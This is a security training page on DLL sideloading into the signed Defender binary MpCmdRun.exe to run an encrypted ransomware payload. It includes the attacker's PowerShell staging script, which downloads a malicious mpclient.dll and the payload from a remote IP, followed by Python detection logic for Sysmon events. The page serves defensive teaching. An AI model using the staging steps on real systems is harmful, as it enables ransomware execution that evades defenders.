Scenario
In this training scenario, we will execute an encrypted ransomware payload via DLL sideloading (often loosely called DLL injection) into the signed MS Defender binary MpCmdRun.exe. A custom mpclient.dll has been created, as an attacker would create it, which decrypts a fake .log file and executes the payload it contains.
Many security tools will simply ignore processes started by a signed parent, particularly a signed antivirus parent, and even more particularly Defender. Defender commands are not only commonly allowed, but often run with extremely high privileges. Here the command that is weaponized is a signature update, something that is not only common but would be ignored by any sort of malware hunt. We demonstrate that even with simple "living off the land" tradecraft, an attacker can execute privileged payloads by staging a simple script, with no custom injection tools on the machine.
Here is the exact script (PowerShell) run on the victim machine. Note that nothing explicitly malicious is happening; copying the Defender executables to a staging directory is done only to highlight the C:\staging files in the root cause analysis.
mkdir C:\staging
copy C:\Windows\WinSxS\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7\* C:\staging
move C:\staging\mpclient.dll C:\staging\realdll.dll; cd C:\staging
curl 169.254.247.102:8000/0x80004006.log -outfile 0x80004006.log; curl 169.254.247.102:8000/mpclient.dll -outfile mpclient.dll
./MpCmdRun.exe -SignatureUpdate
Breaking it down line by line:
Staging directory created
Defender copied to staging directory
Real mpclient.dll is renamed
Encrypted “log” file and malicious DLL are downloaded from a remote server
Real signed MpCmdRun is executed with signature update task
Identifying it
<< SCREENSHOTS GO HERE >>
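The two observables that distinguish this scenario from a normal signature update are the path MpCmdRun.exe runs from and the origin of the mpclient.dll it loads. The following detection logic is an added example written for this training page, not code from the original scenario; it assumes Sysmon-style process-creation (event 1) and image-load (event 7) records with a signature_valid flag, and the list of expected Defender directories is an assumption that must be tuned to the platform versions present in your estate. The sample events are constructed, not real telemetry.

```python
import ntpath
from typing import Dict, List, Optional

# Directories from which Defender binaries legitimately run. This list is an
# assumption for the example: the platform folder name changes with each
# Defender platform version, so we match on the stable prefix. Tune per estate.
EXPECTED_DEFENDER_DIRS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
    r"c:\windows\winsxs\amd64_windows-defender-service_",
)

DEFENDER_IMAGES = {"mpcmdrun.exe", "msmpeng.exe", "nissrv.exe"}
SIDELOAD_TARGET_DLL = "mpclient.dll"


def in_expected_dir(path: str) -> bool:
    """True if the file sits under one of the known Defender locations."""
    p = path.lower()
    return any(p.startswith(prefix) for prefix in EXPECTED_DEFENDER_DIRS)


def evaluate(event: Dict) -> Optional[str]:
    """Return a finding name for a single Sysmon-style event, or None."""
    image_name = ntpath.basename(event["image"]).lower()

    if event["event_id"] == 1:  # process creation
        # The binary is genuinely signed, so the signal is the location: a
        # Defender executable running from a user-writable directory such as
        # C:\staging is not a normal signature update.
        if image_name in DEFENDER_IMAGES and not in_expected_dir(event["image"]):
            return "defender_binary_outside_expected_path"

    elif event["event_id"] == 7:  # image (DLL) load
        loaded = event["image_loaded"]
        if ntpath.basename(loaded).lower() == SIDELOAD_TARGET_DLL:
            # The real mpclient.dll is signed and lives beside the Defender
            # platform files; anything else loaded under that name is a sideload.
            if not event.get("signature_valid", False) or not in_expected_dir(loaded):
                return "mpclient_sideload"

    return None


def hunt(events: List[Dict]) -> List[Dict]:
    """Run every event through evaluate() and collect the hits."""
    findings = []
    for ev in events:
        reason = evaluate(ev)
        if reason:
            findings.append({
                "reason": reason,
                "image": ev["image"],
                "detail": ev.get("image_loaded") or ev.get("command_line"),
            })
    return findings


# Constructed sample events: one benign update, then the staging-directory
# execution and the unsigned DLL load from the scenario above.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "command_line": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -SignatureUpdate',
     "signature_valid": True},
    {"event_id": 1, "image": r"C:\staging\MpCmdRun.exe",
     "command_line": "./MpCmdRun.exe -SignatureUpdate", "signature_valid": True},
    {"event_id": 7, "image": r"C:\staging\MpCmdRun.exe",
     "image_loaded": r"C:\staging\mpclient.dll", "signature_valid": False},
    {"event_id": 7, "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "image_loaded": r"C:\Program Files\Windows Defender\mpclient.dll",
     "signature_valid": True},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['reason']}: {f['image']} -> {f['detail']}")
```

The path check fires first, on the process-creation event, before any payload runs; the image-load check is the backstop that also catches a copy placed inside an expected directory by a more careful operator, because it additionally requires a valid signature on the DLL.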